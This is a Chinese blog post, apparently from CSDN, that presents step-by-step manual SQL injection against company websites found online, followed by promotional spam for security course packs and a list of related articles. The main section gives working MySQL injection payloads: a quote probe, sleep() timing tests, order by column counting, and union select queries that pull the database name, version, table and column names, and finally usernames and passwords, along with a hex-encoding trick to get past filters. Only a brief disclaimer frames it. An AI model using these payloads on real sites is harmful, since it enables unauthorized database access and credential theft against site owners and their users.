渗透测试之sql注入验证安全与攻击性能_sql注入能造成性能问题吗

于 2024-10-08 14:14:20 发布
阅读量746 收藏 28
点赞数 26
文章标签: sql 安全 数据库 网络安全 web安全 计算机网络 密码学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HUANGXIN9898/article/details/142758315
版权

🍅 视频学习: 文末有免费的配套视频可观看

🍅 关注公众号【白帽黑客夜幕】,回复 1 ,免费获取网络安全/黑客技术全套资料,资料在手,涨薪更快

由于渗透测试牵涉到安全性以及攻击性,为了便于交流分享,本人这里不进行具体网址的透露了。

我们可以在网上查找一些公司官方网站如(http://www.XXXXXX.com/xxxx?id=1)

1、拿到网页后进行查找注入点;

1、通过单引号 ’ ; 在 url 后面输入单引号进行回车(如果报错可能存在sql注入为:10%左右)

2、利用逻辑运算(在 url 后面 输入 and 1=1 正常;1=2不正常,sql 注入漏洞概率为:40-60%左右)

3、利用沉睡函数俗称摸鱼函数(在 url 后面输入sleep(10),网页会休眠停留10s ,休眠与网速有关所以sql 注入漏洞概率为:50%左右)

4、利用运算进行测试(eg:id=1 则可以修改为id=2-1或3-2 ,±×÷都能够进行计算并跑通,sql 注入漏洞概率为:95-100%左右)

2、进行测试报字段通过(order by函数);我的字段是9

在url后面加上order by XXX(整数) 利用XXX多次进行寻找临界值(报错与不报错边缘)

3、通过寻找到的字段后进行联合查询;

URL + union select
1,2,3,4,5,6,7,8,9(会出现字段序号对应的位置,1不要变因为通常第一位是序号,后面数字只是占位置可以改变)

4、查询数据库名;

URL + union select
1,2,database(),4,5,6,7,8,9(database(),所占位置当然也是可以改变的的,不要占用1,就行)

5、查询数据库版本号;

URL + union select 1,2,3,4,version(),6,7,8,9
(version(),所占位置当然也是可以改变的的,不要占用1,就行)

查询数据库版本的目的是因为一旦mysql版本大于5.0必然会有默认库information,如下:

![图片](https://img-
blog.csdnimg.cn/img_convert/01407a54877cc6ddb36d969176f7b9fa.png)

我们通常使用的默认库是:information_schema

6、查询数据库中的表名;

URL + union select 1,2,3,4,group_concat(table_name),6,7,8,9,from
information_schema.tables where table_schema=database() 可以查出所有表的表名

7、直接爆出表中用户;

URL + union select 1,2,3,4,group_concat(column_name),6,7,8,9,from
information_schema.columns where table_name=‘表名’

注:有时候开发很聪明会对代码进行特殊字符进行过滤,那么我们就需要进行绕过去,我们可以对’表名‘进行转换为16进制或别的都行然后再进行输入查询

8、查看表中所有信息内容;

URL + union select 1,2,3,4,group_concat(usename,0x7e,password),6,7,8,9,from 表名
则可以查出所有用户具体信息

PS: 我这里如何破解后台网址以及登录就不再详细演示了(注意密码可能需要进行尝试解密)
提倡网络安全,切勿在法律边缘游走,不要随意攻击别人网站

同时,在这我为大家准备了一份软件测试视频教程(含面试、接口、自动化、性能测试等), 就在下方,需要的可以直接去观看,也可以直接 【文末微信扫码免费领取资料文档】
学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

在这里插入图片描述

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

在这里插入图片描述

慕烟疏雨
关注
SQL注入漏洞的检测及防御方法
leyang0910的博客
12-07 677
SQL注入是一种攻击技术,攻击者通过在输入字段中插入恶意SQL代码,试图欺骗应用程序以执行不安全数据库操作。这些恶意SQL代码将与应用程序的数据库进行交互,允许攻击者执行未授权的操作。SQL注入攻击通常针对使用动态SQL查询的Web应用程序,这些查询构建在未正确过滤或验证用户输入的基础上。SQL注入攻击通常涉及使用单引号、双引号、注释符号和逻辑运算符等特殊字符,以绕过应用程序的输入验证,构造恶意SQL查询。成功的攻击可能导致数据库泄漏、数据破坏、未授权访问、甚至完整的数据库服务器控制。
渗透测试SQL注入漏洞
sunnygao的博客
09-27 1917
文章目录SQL注入SQL盲注**时间盲注**联合盲注**获取数据库版本和当前操作系统****尝试获取pikachu数据库中的表名****根据经验猜测****尝试获取users表中的字段名**6.尝试获取用户名和密码sql注入步骤怎样防御SQL注入漏洞 SQL注入 ​ 字符型的注入(加单引号)和 数字型的注入 1' or 1=1# 查出所有数据。 SQL盲注 ​ 在服务器没有错误回显时完成注入攻击,服务器没有回显,对攻击者来说缺少了重要调试信息,所以攻击者必须找到一个方法验证注入的SQL语句是否被执行。 分
渗透测试sql注入验证安全攻击性
HUA6911的博客
01-22 1077
由于渗透测试牵涉到安全性以及攻击性,为了便于交流分享,本人这里不进行具体网址的透露了。我们可以在网上查找一些公司官方网站如(http://www.XXXXXX.com/xxxx?id=1)
SQL注入校验
灼烧的疯狂
07-19 3118
前言 有时业务需求,需要做动态的DDL拼接,此时在代码层级做SQL注入校验 之前有做过字段动态拼接,自己配了两个数据库字典做了一次转换,将页面传过来的值,拿到字典里进行匹配,获取到真实的数据库字段后,再执行SQL 这里翻了几篇帖子,转载记录一下,以下是转载内容: 1. 注解方式,校验入参 注解 import javax.validation.Constraint; import javax.validation.Payload; import java.lang.annotation.ElementType
安全测试—SQL注入
qq_41661843的博客
02-24 1714
SQL注入利用SQL注入漏洞,攻击者可以暴露数据库中的敏感信息,如用户账号、密码等字段值。
Sql注入校验
weixin_30877181的博客
09-16 750
/// <summary> /// Sql注入校验 /// </summary> /// <param name="listWord">字符</param> /// <returns>是否成功</returns> public st...
SQL.rar_SQL注入工具_mountain2rr_sql注入_新品_速度快
09-23
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码可以与数据库交互。"SQL.rar"很可能是一个包含多种SQL注入工具的压缩包,旨在帮助安全专家或者渗透测试人员...
SQL_zhuru.rar_sql 注入_sql注入
09-24
在"SQL_zhuru.rar_sql注入_sql注入"这个压缩包中,可能包含了关于如何识别、预防和应对SQL注入攻击的相关资料。 在"www.pudn.com.txt"文件中,可能包含了从Pudn网站下载的关于SQL注入的技术文章、教程或案例分析。...
sql注入攻击之sqlmap
06-10
为了确保网站免受SQL注入攻击,开发者应遵循以下最佳实践:参数化查询或预编译语句的使用,输入验证,限制数据库用户的权限,及时更新数据库软件以修复已知漏洞,以及定期进行安全审计和渗透测试。 总的来说,SQL...
JAVA实现sql注入点检测
04-24
JAVA实现的网络爬虫以及对爬到的页进行sql注入的判断
SQL注入之如何检测与判断详细过程
01-31
SQL注入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf 5、sqlmapApi的使用 以前注入点满大街,一个单引号就可以判断出是否存在注入点。但是如今随着各大厂商越来越注重安全,各种过滤,各种waf,将注入隐藏的越来越深。那么作为白帽子,该如何判断是否存在注入! 这里附上我挖bat各大厂商时用的判断注入方法。下一期再分享如何过waf。
Web安全SQL注入
01-21
一、什么是SQL注入SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQLSQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取数据库的信息以及提权,此时称发生了SQL注入攻击。 二、举个简单的例子 Web页面的某个表单项需要与后端服务器进行交互,用户输入的数据通过提交之后被后端解析到SELECT查询语句的WHERE字段后面,根据
SQL注入学习----检测
04-02 795
实例1的链接为:http://192.168.10.163/sqli/example1.php?name=root(注:每个人机器上的可能不太一样),从URL中可以看出,参数为字符串”root”,从表中返回一行数据,如下图所示。 为了理解服务器端代码,我们需要对其进行探测。 1.     添加多余字符。比如“1234”,使用?name=root1234,表中未显示任何记录。从这里我
SQL注入之 网页实战测试
最新发布
Hacker_feng的博客
10-01 1125
参数类型分类1. 数字型:当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。如 www.text.com/text.php?id=3 对应的sql语句为 select * from table where id=32. 字符型:字符型注入正好相反当输入的参数被当做字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过引号来闭合的。即看参数是否被引号包裹例如数字型语句:select * from table where id =3。
安全测试|SQL注入技术
m0_59315964的博客
03-30 4655
A01:访问控制失效(Broken Access Control)从第五位上升到了第一位 A02:2021年,加密失败(Cryptographic Failure),此前名为“敏感数据暴露”(Sensitive Data Exposure),这一名称只是描述了广泛的症状而非根本原因——上移到了榜单第二位。 A03:2021年,注入(Injection)下滑到第三位。 A04:不安全设计(Insecure Design)是2021年出现的新类别,并且一出场就高居第四位。 A05:安全配置错误(Secu
sql注入与数据校验总结
yulungggg的博客
04-07 6732
注重java编程规范与安全是Java开发者个人编程一个很好的习惯,以下是对于sql注入的一些学习总结资料,主要有sql注入的说明,jdbc、存储过程、hibernate、mybatis中防止sql注入,以及简单的数据校验说明:SQL注入是指利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不...
渗透测试——SQL注入实验②
YT的博客
02-13 1825
1. 输入目标网站网址,寻找注入点 在输入框中输入 ' 单引号 返回了错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 通过错误显示,数据...
SQL注入测试脚本大全:实战渗透与检测语句
SQL注入是一种常见的Web安全漏洞,攻击者通过构造恶意SQL查询,利用服务器对用户输入的不恰当处理,以获取、修改或控制数据库中的数据。在渗透测试SQL注入测试中,理解并掌握这些常用的测试语句至关重要。以下是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值